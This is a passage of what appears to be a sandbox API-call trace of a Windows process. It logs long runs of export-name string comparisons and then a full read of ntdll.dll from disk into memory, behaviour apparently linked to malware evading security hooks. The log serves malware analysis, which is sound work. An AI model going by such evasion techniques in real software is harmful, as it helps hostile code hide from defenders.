-1 [0262.923] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0262.923] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0262.923] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0262.923] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0262.923] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0262.923] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0262.923] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0262.923] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0262.923] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0262.923] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0262.923] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0262.923] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0262.923] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0262.923] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0262.923] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0262.923] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0262.923] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0262.923] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0262.923] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0262.923] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0262.923] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0262.924] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0262.925] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0262.925] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0262.925] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0262.925] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0262.925] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0262.925] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0262.925] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0262.925] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0262.925] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0262.925] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0262.925] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0262.925] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0262.925] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0262.925] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0262.925] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0262.925] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0262.925] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0262.925] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0262.925] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0262.925] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0262.925] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0262.925] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0262.925] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0262.925] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0262.926] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0262.926] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0262.926] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0262.926] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0262.926] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0262.926] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0262.926] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0262.926] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0262.926] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0262.926] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0262.926] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0262.926] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0262.926] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0262.926] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0262.926] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0262.926] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0262.926] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0262.926] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0262.926] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0262.926] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0262.926] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0262.926] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0262.926] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0262.926] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0262.926] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0262.926] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0262.927] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0262.927] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0262.927] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0262.927] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0262.927] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0262.927] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0262.927] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0262.927] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0262.927] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0262.927] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0262.927] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0262.927] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0262.927] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0262.927] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0262.927] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0262.927] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0262.927] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0262.927] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0262.927] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0262.928] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0262.928] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0262.928] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0262.928] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0262.928] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0262.928] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0262.928] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0262.928] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0262.928] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0262.928] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0262.928] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0262.928] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0262.928] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0262.928] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0262.928] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0262.928] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0262.928] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0262.928] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0262.928] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0262.928] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0262.928] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0262.928] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0262.928] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0262.928] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0262.928] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0262.929] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0262.929] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0262.929] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0262.929] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0262.929] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0262.929] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0262.929] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0262.929] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0262.929] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0262.929] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0263.089] GetProcessHeap () returned 0x400000 [0263.089] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x3ff0040 | out: hHeap=0x400000) returned 1 [0263.097] GetProcessHeap () returned 0x400000 [0263.097] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x10) returned 0x4192a0 [0263.097] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0263.099] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0263.099] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0263.099] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0263.100] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0263.101] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0263.101] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0263.101] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0263.101] GetProcessHeap () returned 0x400000 [0263.101] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x1bba48) returned 0x3ffc040 [0263.188] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0263.188] ReadFile (in: hFile=0x140, lpBuffer=0x3ffc040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3ffc040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0263.349] CloseHandle (hObject=0x140) returned 1 [0263.349] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0263.349] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0263.349] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0263.349] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0263.349] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0263.349] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0263.349] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0263.349] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0263.350] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0263.350] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0263.350] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0263.350] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0263.350] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0263.350] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0263.350] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0263.350] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0263.350] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0263.350] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0263.350] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0263.350] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0263.350] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0263.350] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0263.351] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0263.351] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0263.351] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0263.351] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0263.351] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0263.351] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0263.351] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0263.351] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0263.351] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0263.351] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0263.351] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0263.351] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0263.351] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0263.351] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0263.351] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0263.351] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0263.351] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0263.351] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0263.351] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0263.351] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0263.352] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0263.352] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0263.352] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0263.352] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0263.352] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0263.352] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0263.352] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0263.352] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0263.352] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0263.352] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0263.352] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0263.352] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0263.352] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0263.352] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0263.352] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0263.352] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0263.352] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0263.352] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0263.352] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0263.352] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0263.352] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0263.352] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0263.352] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0263.352] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0263.352] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0263.352] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0263.352] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0263.353] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0263.353] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0263.353] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0263.353] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0263.353] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0263.353] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0263.353] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0263.353] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0263.353] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0263.353] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0263.353] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0263.353] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0263.353] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0263.353] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0263.353] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", 